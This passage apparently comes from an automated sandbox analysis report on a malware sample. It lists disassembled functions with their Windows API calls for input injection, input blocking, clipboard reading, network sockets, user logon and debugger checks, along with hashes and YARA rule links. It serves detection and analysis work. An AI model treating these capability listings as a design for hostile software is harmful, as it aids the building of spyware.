                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                    • String ID: pqI
                                                                                                                                                    • API String ID: 2579439406-2459173057
                                                                                                                                                    • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                    • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                                                    • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                    • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                                                    Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsicollmouse_event
                                                                                                                                                    • String ID: DOWN
                                                                                                                                                    • API String ID: 1033544147-711622031
                                                                                                                                                    • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                    • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                                                    • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                    • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                                                    Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3031425849-0
                                                                                                                                                    • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                    • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                                                    • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                    • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                                                    Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4170576061-0
                                                                                                                                                    • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                    • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                                    • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                    • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                                    Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                    • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                                    • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                                                    • IsIconic.USER32 ref: 0047A393
                                                                                                                                                    • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                    • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                    • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                                    • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                    • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                                    Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                    • String ID: .lnk
                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                    • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                                                    • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                                    • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                                                    • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                                                    Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 15083398-0
                                                                                                                                                    • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                    • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                                                    • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                    • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                                                    Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: U$\
                                                                                                                                                    • API String ID: 4104443479-100911408
                                                                                                                                                    • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                    • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                                                    • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                    • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                                                    Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                                    • Opcode ID: 6657a256bd3447127bf08af48fffe896882875dcfe48375d14e679f7c7ae9787
                                                                                                                                                    • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                                                    • Opcode Fuzzy Hash: 6657a256bd3447127bf08af48fffe896882875dcfe48375d14e679f7c7ae9787
                                                                                                                                                    • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                                                    Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 901099227-0
                                                                                                                                                    • Opcode ID: 97c0115689459c5170db59d582b95bf639c465a717fdad7c54a0526a5dec2c32
                                                                                                                                                    • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                                                    • Opcode Fuzzy Hash: 97c0115689459c5170db59d582b95bf639c465a717fdad7c54a0526a5dec2c32
                                                                                                                                                    • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                                                    Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Proc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2346855178-0
                                                                                                                                                    • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                                    • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                                                    • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                                    • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                                                    Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                    • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                    • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                                                    • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                    • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                                                    Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LogonUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                                    • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                    • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                                                    • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                    • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                                                    Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
